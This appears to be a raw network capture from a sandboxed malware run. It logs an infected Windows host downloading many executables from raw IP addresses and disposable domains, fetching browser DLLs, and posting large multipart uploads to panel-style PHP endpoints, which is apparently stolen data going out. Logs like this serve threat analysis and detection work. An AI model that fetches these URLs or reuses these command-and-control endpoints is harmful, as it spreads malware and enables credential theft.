GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=190400-1826928
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1636529
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: ad6859833c784224e8c3eb5b94a70317
CDN-Cache: HIT
Content-Range: bytes 190400-1826928/59721128
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=1826929-9316763
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 7489835
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: 9b296eda123bc904516df79d92fe59ee
CDN-Cache: HIT
Content-Range: bytes 1826929-9316763/59721128
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=9316764-26128962
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
Response: HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 16812199
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-662
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:23:53
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cc4d850abb6c97e8e6b73e9ea197f32e
CDN-Cache: HIT
Content-Range: bytes 9316764-26128962/59721128
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=26128963-44675237
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
-
GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe (process: BITS)
Remote address: 185.93.2.246:443
Request: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=44675238-59721127
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
-
Remote address: 8.8.8.8:53
Request: 246.2.93.185.in-addr.arpa IN PTR
Response: 246.2.93.185.in-addr.arpa IN PTR 185-93-2-246.bunnyinfra.net
-
Remote address: 20.157.87.45:80
Request: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response: HTTP/1.1 200 OK
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb5
date: Sun, 05 May 2024 22:27:43 GMT
set-cookie: SERVERID=svc5; path=/
connection: close
-
DNS westus2-2.in.applicationinsights.azure.com (process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe)
Remote address: 8.8.8.8:53
Request: westus2-2.in.applicationinsights.azure.com IN A
Response: westus2-2.in.applicationinsights.azure.com IN CNAME westus2-2.in.ai.monitor.azure.com; westus2-2.in.ai.monitor.azure.com IN CNAME westus2-2.in.ai.privatelink.monitor.azure.com; westus2-2.in.ai.privatelink.monitor.azure.com IN CNAME gig-ai-prod-westus2-0.trafficmanager.net; gig-ai-prod-westus2-0.trafficmanager.net IN CNAME gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com; gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com IN A 20.9.155.145
-
POST https://westus2-2.in.applicationinsights.azure.com/v2/track (process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe)
Remote address: 20.9.155.145:443
Request: POST /v2/track HTTP/1.1
Content-Type: application/x-json-stream
Content-Encoding: gzip
Host: westus2-2.in.applicationinsights.azure.com
Content-Length: 854
Expect: 100-continue
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Sun, 05 May 2024 22:27:50 GMT
-
Remote address: 8.8.8.8:53
Request: 145.155.9.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 5.173.189.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 185.172.128.90:80
Request: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.228:80
Request: GET /ping.php?substr=eight HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.59:80
Request: GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "44a00-617bc48b8a72d"
Accept-Ranges: bytes
Content-Length: 281088
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.228:80
Request: GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address: 20.157.87.45:80
Request: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response: HTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Sun, 05 May 2024 22:28:29 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
-
Remote address: 20.157.87.45:80
Request: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response: HTTP/1.1 200 OK
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb5
date: Sun, 05 May 2024 22:28:30 GMT
set-cookie: SERVERID=svc5; path=/
connection: close
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCF
Host: 185.172.128.150
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5416
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
Host: 185.172.128.150
Content-Length: 4999
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
Host: 185.172.128.150
Content-Length: 7863
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "3ef50-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "13bf0-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEG
Host: 185.172.128.150
Content-Length: 8307
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAF
Host: 185.172.128.150
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2052
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJK
Host: 185.172.128.150
Content-Length: 526119
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
Host: 185.172.128.150
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
Host: 185.172.128.150
Content-Length: 3354055
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEG
Host: 185.172.128.150
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
Host: 185.172.128.150
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
Host: 185.172.128.150
Content-Length: 110283
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
Host: 185.172.128.150
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 8.8.8.8:53
Request: 150.128.172.185.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 193.233.132.56:80
Request: POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:29:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address: 193.233.132.56:80
Request: POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 158
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:29:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.172.128.150:80
Request: POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.19:80
Request: POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:29:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.172.128.19:80
Request: POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 158
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:29:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: 97840b67-4dbf-4556-8dde-3dd830aa81a5.uuid.filesdumpplace.org IN TXT
Response: (none)
-
Remote address: 8.8.8.8:53
Request: cdn.discordapp.com IN A
Response: cdn.discordapp.com IN A 162.159.130.233; cdn.discordapp.com IN A 162.159.135.233; cdn.discordapp.com IN A 162.159.129.233; cdn.discordapp.com IN A 162.159.134.233; cdn.discordapp.com IN A 162.159.133.233
-
Remote address: 8.8.8.8:53
Request: server9.filesdumpplace.org IN A
Response: server9.filesdumpplace.org IN A 185.82.216.96
-
Remote address: 8.8.8.8:53
Request: stun.ipfire.org IN A
Response: stun.ipfire.org IN CNAME xmpp.ipfire.org; xmpp.ipfire.org IN A 81.3.27.44
-
Remote address: 8.8.8.8:53
Request: carsalessystem.com IN A
Response: carsalessystem.com IN A 172.67.221.71; carsalessystem.com IN A 104.21.94.82
-
Remote address: 8.8.8.8:53
Request: 233.130.159.162.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 44.27.3.81.in-addr.arpa IN PTR
Response: 44.27.3.81.in-addr.arpa IN PTR xmpp.ipfire.org
-
Remote address: 8.8.8.8:53
Request: 96.216.82.185.in-addr.arpa IN PTR
Response: 96.216.82.185.in-addr.arpa IN PTR dedic-mariadebommarez-1201693.hosted-by-itldc.com
-
Remote address: 8.8.8.8:53
Request: 71.221.67.172.in-addr.arpa IN PTR
Response: (none)
-
80.1kB 2.3MB 1679 1671
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
GET http://193.233.132.56/lend/swiiiii.exe
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
GET http://193.233.132.56/lend/jok.exe
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
GET http://193.233.132.56/lend/swiiii.exe
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
GET http://193.233.132.56/lend/gold.exe
HTTP Response
200
HTTP Request
POST http://193.233.132.56/Pneh2sXQk0/index.php
HTTP Response
200
HTTP Request
GET http://193.233.132.56/lend/alexxxxxxxx.exe
HTTP Response
200
-
1.5kB 7.3kB 13 13
HTTP Request
POST https://affordcharmcropwo.shop/api
HTTP Response
200
HTTP Request
POST https://affordcharmcropwo.shop/api
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://cleartotalfisherwo.shop/api
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://worryfillvolcawoi.shop/api
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://enthusiasimtitleow.shop/api
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://dismissalcylinderhostw.shop/api
HTTP Response
200
-
1.3MB 26.5kB 970 453
-
1.1kB 6.3kB 11 10
HTTP Request
POST https://diskretainvigorousiw.shop/api
HTTP Response
200
-
15.4kB 432.7kB 320 311
HTTP Request
GET http://193.233.132.234/files/file300un.exe
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://communicationgenerwo.shop/api
HTTP Response
200
-
1.1kB 6.7kB 10 10
HTTP Request
POST https://pillowbrocccolipe.shop/api
HTTP Response
200
-
1.1kB 6.3kB 11 9
HTTP Request
POST https://zippyfinickysofwps.shop/api
HTTP Response
200
-
812 B 6.2kB 10 10
HTTP Request
GET https://pastebin.com/raw/E0rY26ni
HTTP Response
200
-
1.0kB 14.2kB 15 19
HTTP Request
GET https://yip.su/RNWPd.exe
HTTP Response
200
-
1.0kB 6.3kB 9 10
HTTP Request
POST https://acceptabledcooeprs.shop/api
HTTP Response
200
-
7.6kB 306.5kB 156 233
HTTP Request
GET http://185.172.128.59/ISetup5.exe
HTTP Response
200
-
21.7kB 1.2MB 461 831
HTTP Request
GET http://193.233.132.175/server/ww12/AppGate2103v01.exe
HTTP Response
200
-
36.4kB 2.0MB 773 1401
HTTP Request
GET http://193.233.132.234/files/setup.exe
HTTP Response
200
HTTP Request
GET http://193.233.132.234/files/setup.exe
-
316 B 634 B 5 2
HTTP Request
GET http://193.233.132.234/files/loader-2841.exe
HTTP Response
404
-
840 B 6.2kB 10 10
HTTP Request
GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
HTTP Response
307
-
840 B 6.2kB 10 11
HTTP Request
GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
HTTP Response
307
-
104.21.18.166:443 https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe tls, http regsvcs.exe 844 B 6.2kB 10 10
HTTP Request
GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
HTTP Response
307
-
104.21.18.166:443 https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe tls, http regsvcs.exe 844 B 6.2kB 10 10
HTTP Request
GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
HTTP Response
307
-
967 B 5.7kB 8 8
HTTP Request
POST https://obsceneclassyjuwks.shop/api
-
104.21.31.124:443 https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe tls, http regsvcs.exe 5.7kB 172.2kB 106 130
HTTP Request
GET https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
HTTP Response
200
-
104.21.31.124:443 https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe tls, http regsvcs.exe 3.6kB 117.7kB 66 91
HTTP Request
GET https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
HTTP Response
200
-
104.21.60.76:443 https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe tls, http regsvcs.exe 3.5kB 117.7kB 64 91
HTTP Request
GET https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
HTTP Response
200
-
104.21.60.76:443 https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe tls, http regsvcs.exe 3.1kB 103.8kB 56 81
HTTP Request
GET https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
HTTP Response
200
-
52 B 1
-
92 B 40 B 2 1
-
46 B 977 B 1 2
-
11.1kB 317.8kB 232 234
-
550 B 5.4kB 6 6
-
133 B 1
-
1.1kB 28.0kB 22 22
-
1.4MB 18.9kB 1039 448
-
8.7kB 230.4kB 176 175
HTTP Request
GET http://185.172.128.19/NewB.exe
HTTP Response
200
-
3.1MB 60.1kB 2324 1310
-
1.1kB 1.4kB 11 8
HTTP Request
POST http://185.172.128.19/ghsdh39s/index.php
HTTP Response
200
HTTP Request
POST http://185.172.128.19/ghsdh39s/index.php
HTTP Response
200
HTTP Response
200
-
